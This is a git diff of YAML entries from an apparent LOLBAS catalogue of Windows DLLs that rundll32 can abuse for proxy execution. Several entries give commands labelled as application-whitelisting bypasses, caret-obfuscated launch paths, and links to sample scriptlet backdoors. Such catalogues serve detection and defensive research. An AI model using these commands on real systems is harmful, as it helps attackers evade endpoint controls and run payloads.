"cmd.exe /c calc.exe" - Description: Launch command line by calling the RegisterOCX function. - UseCase: Run an executable payload. 
- Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 -Full_Path: - - Path: c:\windows\system32\ieadvpack.dll - - Path: c:\windows\syswow64\ieadvpack.dll -Code_Sample: - - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf - - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct -Detection: - - IOC: -Resources: - - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ - - Link: https://twitter.com/pabraeken/status/991695411902599168 - - Link: https://twitter.com/0rbz_/status/974472392012689408 -Acknowledgement: - - Person: Jimmy (LaunchINFSection) - Handle: '@bohops' - - Person: Fabrizio (RegisterOCX - DLL) - Handle: '@0rbz_' - - Person: Pierre-Alexandre Braeken (RegisterOCX - CMD) - Handle: '@pabraeken' ---- +--- +Name: Ieadvpack.dll +Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). + UseCase: Run local or remote script(let) code through INF file specification. + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). + UseCase: Run local or remote script(let) code through INF file specification. 
+ Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll + Description: Launch a DLL payload by calling the RegisterOCX function. + UseCase: Load a DLL payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe + Description: Launch an executable by calling the RegisterOCX function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" + Description: Launch command line by calling the RegisterOCX function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 +Full_Path: + - Path: c:\windows\system32\ieadvpack.dll + - Path: c:\windows\syswow64\ieadvpack.dll +Code_Sample: + - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf + - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ + - Link: https://twitter.com/pabraeken/status/991695411902599168 + - Link: https://twitter.com/0rbz_/status/974472392012689408 +Acknowledgement: + - Person: Jimmy (LaunchINFSection) + Handle: '@bohops' + - Person: Fabrizio (RegisterOCX - DLL) + Handle: '@0rbz_' + - Person: Pierre-Alexandre Braeken (RegisterOCX - CMD) + Handle: '@pabraeken' +--- 
diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index ab4068c..19832be 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml 
@@ -1,33 +1,33 @@ ---- -Name: Ieaframe.dll -Description: Internet Browser DLL for translating HTML code. -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\ieframe.dll - - Path: c:\windows\syswow64\ieframe.dll -Code_Sample: - - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url -Detection: - - IOC: -Resources: - - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - - Link: https://twitter.com/bohops/status/997690405092290561 - - Link: https://windows10dll.nirsoft.net/ieframe_dll.html -Acknowledgement: - - Person: Jimmy - Handle: '@bohops' - - Person: Adam - Handle: '@hexacorn' ---- - +--- +Name: Ieaframe.dll +Description: Internet Browser DLL for translating HTML code. +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" + Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. + UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. 
+ Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\ieframe.dll + - Path: c:\windows\syswow64\ieframe.dll +Code_Sample: + - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url +Detection: + - IOC: +Resources: + - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ + - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ + - Link: https://twitter.com/bohops/status/997690405092290561 + - Link: https://windows10dll.nirsoft.net/ieframe_dll.html +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' + - Person: Adam + Handle: '@hexacorn' +--- + diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 9866975..63b335a 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml 
@@ -1,28 +1,28 @@ ---- -Name: Mshtml.dll -Description: Microsoft HTML Viewer -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" - Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). - UseCase: Launch an HTA application. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\mshtml.dll - - Path: c:\windows\syswow64\mshtml.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://twitter.com/pabraeken/status/998567549670477824 - - Link: https://windows10dll.nirsoft.net/mshtml_dll.html -Acknowledgement: - - Person: Pierre-Alexandre Braeken - Handle: '@pabraeken' ---- +--- +Name: Mshtml.dll +Description: Microsoft HTML Viewer +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" + Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). + UseCase: Launch an HTA application. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\mshtml.dll + - Path: c:\windows\syswow64\mshtml.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/pabraeken/status/998567549670477824 + - Link: https://windows10dll.nirsoft.net/mshtml_dll.html +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' +--- diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 35c726a..8a96d19 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml 
@@ -1,28 +1,28 @@ ---- -Name: Pcwutl.dll -Description: Microsoft HTML Viewer -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe - Description: Launch executable by calling the LaunchApplication function. - UseCase: Launch an executable. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\pcwutl.dll - - Path: c:\windows\syswow64\pcwutl.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://twitter.com/harr0ey/status/989617817849876488 - - Link: https://windows10dll.nirsoft.net/pcwutl_dll.html -Acknowledgement: - - Person: Matt harr0ey - Handle: '@harr0ey' ---- +--- +Name: Pcwutl.dll +Description: Microsoft HTML Viewer +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe + Description: Launch executable by calling the LaunchApplication function. + UseCase: Launch an executable. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\pcwutl.dll + - Path: c:\windows\syswow64\pcwutl.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/harr0ey/status/989617817849876488 + - Link: https://windows10dll.nirsoft.net/pcwutl_dll.html +Acknowledgement: + - Person: Matt harr0ey + Handle: '@harr0ey' +--- diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 06ab00e..a5b1655 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml 
@@ -1,46 +1,46 @@ ---- -Name: Setupapi.dll -Description: Windows Setup Application Programming Interface -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf - Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. - UseCase: Load an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\setupapi.dll - - Path: c:\windows\syswow64\setupapi.dll -Code_Sample: - - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf - - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct - - Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct - - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf -Detection: - - IOC: -Resources: - - Link: https://github.com/huntresslabs/evading-autoruns - - Link: https://twitter.com/pabraeken/status/994742106852941825 - - Link: https://windows10dll.nirsoft.net/setupapi_dll.html -Acknowledgement: - - Person: Kyle Hanslovan (COM Scriptlet) - Handle: '@KyleHanslovan' - - Person: Huntress Labs (COM Scriptlet) - Handle: 
'@HuntressLabs' - - Person: Casey Smith (COM Scriptlet) - Handle: '@subTee' - - Person: Nick Carr (Threat Intel) - Handle: '@ItsReallyNick' ---- +--- +Name: Setupapi.dll +Description: Windows Setup Application Programming Interface +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). + UseCase: Run local or remote script(let) code through INF file specification. + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf + Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. + UseCase: Load an executable payload. 
+ Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\setupapi.dll + - Path: c:\windows\syswow64\setupapi.dll +Code_Sample: + - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf + - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct + - Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct + - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf +Detection: + - IOC: +Resources: + - Link: https://github.com/huntresslabs/evading-autoruns + - Link: https://twitter.com/pabraeken/status/994742106852941825 + - Link: https://windows10dll.nirsoft.net/setupapi_dll.html +Acknowledgement: + - Person: Kyle Hanslovan (COM Scriptlet) + Handle: '@KyleHanslovan' + - Person: Huntress Labs (COM Scriptlet) + Handle: '@HuntressLabs' + - Person: Casey Smith (COM Scriptlet) + Handle: '@subTee' + - Person: Nick Carr (Threat Intel) + Handle: '@ItsReallyNick' +--- diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 7e006cf..7aeb700 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml 
@@ -1,32 +1,32 @@ ---- -Name: Shdocvw.dll -Description: Shell Doc Object and Control Library. -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\shdocvw.dll - - Path: c:\windows\syswow64\shdocvw.dll -Code_Sample: - - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url -Detection: - - IOC: -Resources: - - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - - Link: https://twitter.com/bohops/status/997690405092290561 - - Link: https://windows10dll.nirsoft.net/shdocvw_dll.html -Acknowledgement: - - Person: Adam - Handle: '@hexacorn' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: Shdocvw.dll +Description: Shell Doc Object and Control Library. +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" + Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. + UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. 
+ Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\shdocvw.dll + - Path: c:\windows\syswow64\shdocvw.dll +Code_Sample: + - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url +Detection: + - IOC: +Resources: + - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ + - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ + - Link: https://twitter.com/bohops/status/997690405092290561 + - Link: https://windows10dll.nirsoft.net/shdocvw_dll.html +Acknowledgement: + - Person: Adam + Handle: '@hexacorn' + - Person: Jimmy + Handle: '@bohops' +--- diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 7231311..d4f554c 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml 
@@ -1,51 +1,51 @@ ---- -Name: Shell32.dll -Description: Windows Shell Common Dll -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll - Description: Launch a DLL payload by calling the Control_RunDLL function. - UseCase: Load a DLL payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe - Description: Launch an executable by calling the ShellExec_RunDLL function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" - Description: Launch command line by calling the ShellExec_RunDLL function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 -Full_Path: - - Path: c:\windows\system32\shell32.dll - - Path: c:\windows\syswow64\shell32.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://twitter.com/Hexacorn/status/885258886428725250 - - Link: https://twitter.com/pabraeken/status/991768766898941953 - - Link: https://twitter.com/mattifestation/status/776574940128485376 - - Link: https://twitter.com/KyleHanslovan/status/905189665120149506 - - Link: https://windows10dll.nirsoft.net/shell32_dll.html -Acknowledgement: - - Person: Adam (Control_RunDLL) - Handle: '@hexacorn' - - Person: Pierre-Alexandre Braeken (ShellExec_RunDLL) - Handle: '@pabraeken' - - Person: Matt Graeber (ShellExec_RunDLL) - Handle: '@mattifestation' - - Person: Kyle Hanslovan (ShellExec_RunDLL) - Handle: '@KyleHanslovan' ---- +--- +Name: Shell32.dll +Description: Windows Shell Common Dll +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll + 
Description: Launch a DLL payload by calling the Control_RunDLL function. + UseCase: Load a DLL payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe + Description: Launch an executable by calling the ShellExec_RunDLL function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" + Description: Launch command line by calling the ShellExec_RunDLL function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 +Full_Path: + - Path: c:\windows\system32\shell32.dll + - Path: c:\windows\syswow64\shell32.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/Hexacorn/status/885258886428725250 + - Link: https://twitter.com/pabraeken/status/991768766898941953 + - Link: https://twitter.com/mattifestation/status/776574940128485376 + - Link: https://twitter.com/KyleHanslovan/status/905189665120149506 + - Link: https://windows10dll.nirsoft.net/shell32_dll.html +Acknowledgement: + - Person: Adam (Control_RunDLL) + Handle: '@hexacorn' + - Person: Pierre-Alexandre Braeken (ShellExec_RunDLL) + Handle: '@pabraeken' + - Person: Matt Graeber (ShellExec_RunDLL) + Handle: '@mattifestation' + - Person: Kyle Hanslovan (ShellExec_RunDLL) + Handle: '@KyleHanslovan' +--- diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index fffd442..9f8cb02 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml 
@@ -1,44 +1,44 @@ ---- -Name: Syssetup.dll -Description: Windows NT System Setup -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification (Note May pop an error window). - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf - Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. - UseCase: Load an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\syssetup.dll - - Path: c:\windows\syswow64\syssetup.dll -Code_Sample: - - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf - - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct - - Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415 -Detection: - - IOC: -Resources: - - Link: https://twitter.com/pabraeken/status/994392481927258113 - - Link: https://twitter.com/harr0ey/status/975350238184697857 - - Link: https://twitter.com/bohops/status/975549525938135040 - - Link: https://windows10dll.nirsoft.net/syssetup_dll.html -Acknowledgement: - - Person: Pierre-Alexandre Braeken (Execute) - Handle: '@pabraeken' - - Person: Matt harr0ey (Execute) - Handle: '@harr0ey' - - Person: Jimmy (Scriptlet) - Handle: '@bohops' ---- +--- +Name: Syssetup.dll +Description: Windows NT System Setup 
+Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). + UseCase: Run local or remote script(let) code through INF file specification (Note May pop an error window). + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf + Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. + UseCase: Load an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\syssetup.dll + - Path: c:\windows\syswow64\syssetup.dll +Code_Sample: + - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf + - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct + - Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415 +Detection: + - IOC: +Resources: + - Link: https://twitter.com/pabraeken/status/994392481927258113 + - Link: https://twitter.com/harr0ey/status/975350238184697857 + - Link: https://twitter.com/bohops/status/975549525938135040 + - Link: https://windows10dll.nirsoft.net/syssetup_dll.html +Acknowledgement: + - Person: Pierre-Alexandre Braeken (Execute) + Handle: '@pabraeken' + - Person: Matt harr0ey (Execute) + Handle: '@harr0ey' + - Person: Jimmy (Scriptlet) + Handle: '@bohops' +--- diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 5b82185..d8164b6 100644 --- a/yml/OSLibraries/Url.yml 
+++ b/yml/OSLibraries/Url.yml 
@@ -1,78 +1,78 @@ ---- -Name: Url.dll -Description: Internet Shortcut Shell Extension DLL. -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" - Description: Launch a HTML application payload by calling OpenURL. - UseCase: Invoke an HTML Application via mshta.exe (Default Handler). - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e - Description: Launch an executable by calling OpenURL. - UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe - Description: Launch an executable by calling FileProtocolHandler. - UseCase: Launch an executable. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e - Description: Launch an executable by calling FileProtocolHandler. - UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). 
- Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta - Description: Launch a HTML application payload by calling FileProtocolHandler. - UseCase: Invoke an HTML Application via mshta.exe (Default Handler). - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\url.dll - - Path: c:\windows\syswow64\url.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - - Link: https://twitter.com/DissectMalware/status/995348436353470465 - - Link: https://twitter.com/bohops/status/974043815655956481 - - Link: https://twitter.com/yeyint_mth/status/997355558070927360 - - Link: https://twitter.com/Hexacorn/status/974063407321223168 - - Link: https://windows10dll.nirsoft.net/url_dll.html -Acknowledgement: - - Person: Adam (OpenURL) - Handle: '@hexacorn' - - Person: Jimmy (OpenURL) - Handle: '@bohops' - - Person: Malwrologist (FileProtocolHandler - HTA) - Handle: '@DissectMalware' - - Person: r0lan (Obfuscation) - Handle: '@r0lan' ---- +--- +Name: Url.dll +Description: Internet Shortcut Shell Extension DLL. +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" + Description: Launch a HTML application payload by calling OpenURL. + UseCase: Invoke an HTML Application via mshta.exe (Default Handler). 
+ Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" + Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. + UseCase: Load an executable payload by calling a .url file with or without quotes. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e + Description: Launch an executable by calling OpenURL. + UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe + Description: Launch an executable by calling FileProtocolHandler. + UseCase: Launch an executable. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e + Description: Launch an executable by calling FileProtocolHandler. + UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta + Description: Launch a HTML application payload by calling FileProtocolHandler. + UseCase: Invoke an HTML Application via mshta.exe (Default Handler). 
